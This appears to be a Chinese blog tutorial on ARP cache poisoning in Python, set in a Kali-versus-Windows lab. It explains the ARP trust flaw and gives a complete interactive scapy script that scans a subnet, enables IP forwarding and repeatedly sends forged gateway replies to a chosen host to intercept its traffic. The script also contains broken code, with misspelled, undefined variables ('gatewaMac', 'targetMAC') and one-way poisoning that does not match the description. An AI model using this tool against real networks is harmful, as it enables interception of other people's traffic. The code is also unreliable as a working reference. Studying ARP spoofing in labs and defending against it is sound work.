Python渗透测试之ARP毒化和协议应用

简介: Python渗透测试之ARP毒化和协议应用

Python渗透测试之ARP毒化和协议应用
1. ARP毒化
ARP毒化是一种比较老的渗透测试技术,通过ARP毒化技术分析并提取内网流量中的敏感信息,往往会有许多意外的收获。

1.1 工作原理
ARP(地址解析协议)是数据链路层的协议, 主要负责根据网络层地址(IP)来获取数据链路层地址(MAC)。以太网协议规定,同一局域网中的一台主机要和另一台主机进行直接通信,必须知道目标主机的MAC地址。而在TCP/IP中,网络只关注目标主机的IP地址,这就导致在以太网中使用IP协议时,数据链路层的以太网协议接收到网络层的IP协议提供的数据中,只包含目的主机IP地址,于是需要ARP来完成IP地址到MAC地址到转换。本地ARP缓存表是有生存周期的,ARP有一个重大缺陷:ARP是建立在网络中各个主机互相信任的基础上的,主机接收到ARP应答报文时不会检测该报文的真实性,而直接将报文中的IP和MAC记入其ARP缓存表。如果ARP缓存表中有相同的地址项,则会对其进行更新。由此,攻击者可以向受害者主机发送伪ARP应答包,毒化受害主机的ARP缓存表。如下图:

开始毒化时,攻击机会给靶机发送ARP应答包说“我就是网关”,同时也会给网关发送ARP应答包说“我就是靶机。由于ARP缺陷,靶机和网关都会认为这应答包是真的。这样靶机和网关之间的通信就变成上图所示,靶机和网关之间的流量都要通过攻击机。

靶机ARP毒化之前,网关IP和MAC地址、攻击机IP和MAC地址,缓存表如下图红框:

image.png

下图是攻击机MAC地址
image.png

靶机ARP毒化之后,网关IP和MAC地址,缓存表如下图红框:

image.png

网关MAC地址变成攻击机的MAC地址了。

1.2 ARP毒化及应用
运行环境:

攻击机:Linux kali 5.10.0

靶 机:Win10

功能模块:

获取网段内存活主机
获取指定IP主机的MAC地址
ARP毒化
示例代码如下:

#_*_coding:utf-8_*_
# 作者      :liuxiaowei
# 创建时间   :4/25/22 9:08 AM
# 文件      :arp获取网络存活主机.py
# IDE      :PyCharm


from scapy.all import *
import sys
import os

# 存放本机的mac地址
lmac = ""
# 存放本机的ip地址
#lip = ""
# 存放存活主机的ip和mac的字典
liveHost = {
   }

# 获取存活主机的IP地址和MAC地址的函数
def GetAllMAC(lip):
    # IP扫描列表
    scanList = lip + '/24'
    try:
        # 通过对每个IP都进行ARP广播,获得存活主机的MAC地址
        ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=scanList), timeout=2)
    except Exception as e:
        print(e)

    # ARP广播发送完毕后执行
    else:
        # ans包含存活主机返回的响应包和响应内容
        for send, rcv in ans:
            addrList = rcv.sprintf("%Ether.src%|%ARP.psrc%")
            liveHost[addrList.split("|")[1]] = addrList.split("|")[0]

# 根据IP地址获取主机的MAC地址
def GetOneMAC(targetIP):
    # 若该IP地址存在,则返回MAC地址
    if targetIP in liveHost.keys():
        return liveHost[targetIP]
    else:
        return 0

# ARP毒化函数
def poison(targetIP, gatewayIP, ifname):
    # 获取毒化主机的MAC地址
    targetMac = GetOneMAC(targetIP)
    # 获取网关的MAC地址
    gatewayMac = GetOneMAC(gatewayIP)

    if targetMac and gatewaMac:
        while True:
            # 对目标主机毒化
            sendp(Ether(src=lmac, dst=targetMac)/ARP(hwsrc =lmac, hwdst = targetMAC, psrc=gatewayIP, pdst=targetIP, op=2),
                  iface = ifname, verbose = False)
            time.sleep(1)
    else:
        print('目标主机/网关主机IP有误,请检查!')
        sys.exit(0)

if __name__ == "__main__":
    # 程序界面
    print('\t\t\033[0;30;46m === ARP协议功能应用 === \033[0m')

    print('\n\t\t\t[1] 获取网段内存活主机:')
    print('\n\t\t\t[2] 获取指定IP主机的MAC地址')
    print('\n\t\t\t[3] ARP毒化')
    print('\n\t\t\t[4] 退  出 ')
    # while 循环
    Done = True
    while Done:
        choice = int(input('\n\t\t\033[0;30;44m 请输入选项:\t \033[0m'))
        if choice == 1:
            lip = input('\n\t\t\033[0;30;44m 请输入网段地址:\t  \033[0m')
            GetAllMAC(lip)
            print(f'\n开始收集存活的主机.....:\n{liveHost}')
            print(f'存活主机数量为:{len(liveHost)}个')

        elif choice == 2:
            targetip = input('\n\t\t\033[0;30;44m 请输入指定主机地址:\t \033[0m')
            print(f'主机{targetip}的MAC地址: {GetOneMAC(targetip)}')
        elif choice == 3:
            print('\033[0;30;41m 开启路由转发功能.........\033[0m')
            os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
            targetip = input('\n\t\t\033[0;30;44m 请输入目标主机IP地址:\t \033[0m')
            gatewayip = input('\n\t\t\033[0;30;44m 请输入网关IP地址:\t \033[0m')
            ifname = 'eth0'
            lmac = get_if_hwaddr(ifname)  # 获取本地mac地址

            try:
                print('\033[0;30;41m 开始毒化.........\033[0m')
                print(lmac)
                print(targetip)
                poison(targetip, gatewayip, ifname)
            except KeyboardInterrupt:
                print('\033[0;30;41m === 停止ARP毒化 === \033[0m')
                print('\033[0;30;41m === 停止路由转发功能 === \033[0m')

        elif choice == 4:
            Done = False
            break

运行结果如下:

下图是程序运行界面
image.png

下图是获取网段内存活主机模块运行结果:

image.png

下图是获取指定IP地址主机的MAC地址模块运行结果:

image.png

下图是ARP毒化模块运行结果:

image.png
image.png

攻击机开启路由转发,所以靶机ping www.baidu.com是可以通的,数据包被攻击机捕获。

相关文章
|
3月前
|
测试技术 开发者 Python
Python单元测试入门:3个核心断言方法,帮你快速定位代码bug
本文介绍Python单元测试基础,详解`unittest`框架中的三大核心断言方法:`assertEqual`验证值相等,`assertTrue`和`assertFalse`判断条件真假。通过实例演示其用法,帮助开发者自动化检测代码逻辑,提升测试效率与可靠性。
327 1
|
4月前
|
监控 安全 Shell
管道符在渗透测试与网络安全中的全面应用指南
管道符是渗透测试与网络安全中的关键工具,既可用于高效系统管理,也可能被攻击者利用实施命令注入、权限提升、数据外泄等攻击。本文全面解析管道符的基础原理、实战应用与防御策略,涵盖Windows与Linux系统差异、攻击技术示例及检测手段,帮助安全人员掌握其利用方式与防护措施,提升系统安全性。
194 6
|
7月前
|
存储 人工智能 测试技术
HarmonyOS Next~HarmonyOS应用测试全流程解析:从一级类目上架到二级类目专项测试
本文深入解析HarmonyOS应用测试全流程,涵盖从一级类目通用测试到二级类目专项测试的技术方案。针对兼容性、性能、安全测试及分布式能力验证等关键环节,提供详细实践指导与代码示例。同时,结合典型案例分析常见问题及优化策略,帮助开发者满足华为严苛的质量标准,顺利上架应用。文章强调测试在开发中的核心地位,助力打造高品质HarmonyOS应用。
352 2
|
3月前
|
人工智能 数据可视化 测试技术
AI 时代 API 自动化测试实战:Postman 断言的核心技巧与实战应用
AI 时代 API 自动化测试实战:Postman 断言的核心技巧与实战应用
469 11
|
3月前
|
消息中间件 运维 应用服务中间件
“企业微信iPad协议”凌晨断链:当最后一台测试机决定集体沉默
凌晨1:12,三连报警突响:“实例心跳超时”“消息队列堆积”“老板提刀赶来”。问题源于企业微信iPad协议迁移私有化后,因新旧CA根证书不兼容,触发TLS握手失败,导致全量会话中断。苹果严苛的证书校验机制将请求判定为中间人攻击,直接断连。排查抓包定位:客户端内置证书Pin仅认旧根。解决方案简单却关键:F5重导旧根证书,Nginx配置`ssl_trusted_certificate`指向旧链并reload。2:58,系统恢复,演练数据零丢失。教训深刻:文档未提CA白名单,真实逻辑藏于客户端二进制。部署前务必比对证书指纹,否则警报先于用户消息抵达。
177 1
|
4月前
|
运维 Linux 开发者
Linux系统中使用Python的ping3库进行网络连通性测试
以上步骤展示了如何利用 Python 的 `ping3` 库来检测网络连通性,并且提供了基本错误处理方法以确保程序能够优雅地处理各种意外情形。通过简洁明快、易读易懂、实操性强等特点使得该方法非常适合开发者或系统管理员快速集成至自动化工具链之内进行日常运维任务之需求满足。
235 18
|
4月前
|
搜索推荐 Devops 测试技术
避免无效回归!基于MCP协议的精准测试影响分析实践
本文揭示传统测试的"孤岛困境",提出MCP(Model Context Protocol)测试新范式,通过模型抽象业务、上下文感知环境和协议规范协作,实现从机械执行到智能测试的转变。剖析MCP如何颠覆测试流程,展示典型应用场景,并提供团队落地实践路径,助力测试工程师把握质量效率革命的新机遇。
|
4月前
|
机器学习/深度学习 存储 分布式计算
Java 大视界 --Java 大数据机器学习模型在金融风险压力测试中的应用与验证(211)
本文探讨了Java大数据与机器学习模型在金融风险压力测试中的创新应用。通过多源数据采集、模型构建与优化,结合随机森林、LSTM等算法,实现信用风险动态评估、市场极端场景模拟与操作风险预警。案例分析展示了花旗银行与蚂蚁集团的智能风控实践,验证了技术在提升风险识别效率与降低金融风险损失方面的显著成效。
|
4月前
|
安全 测试技术 API
Python 单元测试详解
单元测试是Python开发中不可或缺的环节,能确保代码按预期运行、发现Bug、提升代码质量并支持安全重构。本文从基础概念讲起,逐步介绍Python单元测试的实践方法,涵盖unittest框架、pytest框架、断言使用、Mock技巧及测试覆盖率分析,助你全面掌握单元测试技能。
228 0
|
4月前
|
人工智能 IDE 测试技术
Browser-Use在UI自动化测试中的应用
Browser-Use是一款浏览器自动化工具,具备视觉与HTML解析、多标签管理、操作记录与复现、自定义操作、自我纠正及并行执行等功能,助力AI智能体高效完成网页任务。
319 0

热门文章

最新文章

推荐镜像

更多